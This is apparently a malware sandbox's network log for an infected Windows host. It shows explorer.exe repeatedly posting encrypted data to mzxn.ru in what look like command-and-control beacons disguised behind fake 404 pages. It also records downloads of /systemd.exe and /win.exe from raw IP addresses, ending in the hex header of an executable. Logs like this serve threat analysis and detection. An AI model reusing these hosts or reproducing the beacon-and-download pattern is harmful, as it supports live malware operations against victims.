Jul 27, 2024 08:53:29.849215031 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:53:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	50680	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:53:29.858614922 CEST	277	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nsmonxwrtdtb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 367 Host: mzxn.ru
Jul 27, 2024 08:53:29.858614922 CEST	367	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 20 59 aa 8c Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vu Y^}'-r)`HVRdTVDyVGkV[<i{9,I}qqr6,YihVp\|_a`_6]D
Jul 27, 2024 08:53:31.051366091 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:53:30 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	50681	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:53:31.059767962 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jcdtuefeynnuyume.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 247 Host: mzxn.ru
Jul 27, 2024 08:53:31.059767962 CEST	247	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 60 42 da 95 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vu`BZH\|cz5(DUX=V*/jH:+CHA>SQz5-,iuP)Dt"5?ZE/=TQ<wwWWJh`eH.$
Jul 27, 2024 08:53:32.250226974 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:53:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	50682	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:53:32.259426117 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jmeyyrwebcswyji.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 287 Host: mzxn.ru
Jul 27, 2024 08:53:32.259426117 CEST	287	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 7c 1a b9 ad Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vu\|])Xu^nLA7UU}W*:q';B5[,9rI(B/E0"<h7FYV!3aBQN0czgs&/7
Jul 27, 2024 08:53:33.493019104 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:53:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50683	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:53:33.506978035 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://csqyjswelakff.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 205 Host: mzxn.ru
Jul 27, 2024 08:53:33.506978989 CEST	205	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 42 2d db ed Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vuB-yDoh\|?^u7'}E(QAN}H1ZCqxV))]0:`cc^r6&
Jul 27, 2024 08:53:34.940644979 CEST	189	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:53:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
Jul 27, 2024 08:53:34.945734024 CEST	189	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:53:34 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	50684	77.221.157.163	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:53:34.949309111 CEST	163	OUT	GET /systemd.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 77.221.157.163

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	50686	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:53:56.123436928 CEST	277	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uiqytnopuefi.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 294 Host: mzxn.ru
Jul 27, 2024 08:53:56.123476028 CEST	294	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 4e 0a d7 96 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vuNn*z=4Z_X:bgfG"z%C7&JfuY,uY#zZLUZ-$?;%/pCs}_l{f
Jul 27, 2024 08:53:57.333000898 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:53:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	50687	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:53:57.342179060 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sqybtthvvjvcy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 366 Host: mzxn.ru
Jul 27, 2024 08:53:57.342179060 CEST	366	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 44 28 ba 93 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vuD({G`BppvpL0blA9hsY HO/SP1@-$U.MR'?J&Z!&FzGGZhg.%
Jul 27, 2024 08:53:58.536006927 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:53:58 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	50688	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:53:58.545068979 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uancqnbiphxqrd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 113 Host: mzxn.ru
Jul 27, 2024 08:53:58.545068979 CEST	113	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 5f 3d ca fc Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vu_=OWmk5~);2
Jul 27, 2024 08:53:59.759270906 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:53:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50689	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:53:59.779663086 CEST	276	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://voprlhobiib.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 311 Host: mzxn.ru
Jul 27, 2024 08:53:59.779663086 CEST	311	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 48 02 a0 9f Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vuHN\W\|8(rI-iGi1L{+;AUe{W=F:OWD3^+GC3^qN@l~Lg(^F4
Jul 27, 2024 08:54:00.984730005 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:54:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	50690	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:54:00.996542931 CEST	276	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ychtpaufegv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 367 Host: mzxn.ru
Jul 27, 2024 08:54:00.996543884 CEST	367	OUT	Data Raw: 3b 6e 53 13 f6 c8 69 24 db ab b4 02 00 06 73 c9 7e 0b ba e1 62 75 95 11 7b 0b 78 97 40 cb b6 1e 92 56 cf 5b 74 69 52 1f e6 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 4f 00 e6 e9 Data Ascii: ;nSi$s~bu{x@V[tiR? 9Yt M@NA -[k,vuOmjjmYi\|NU`{V'ew8nJ<ZMpd,.'~cHmCwfx@'?Q Zh@c/BT1
Jul 27, 2024 08:54:02.228390932 CEST	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 06:54:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2f 5f 24 17 ad 68 44 aa a9 14 bd cf b3 f9 6d 83 27 db b6 26 42 10 Data Ascii: #\/_$hDm'&B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50691	64.190.113.113	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:54:02.235908985 CEST	159	OUT	GET /win.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 64.190.113.113
Jul 27, 2024 08:54:02.842060089 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:54:02 GMT Server: Apache Last-Modified: Mon, 22 Jul 2024 19:29:34 GMT ETag: "f1600-61ddb109e6b16" Accept-Ranges: bytes Content-Length: 988672 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This 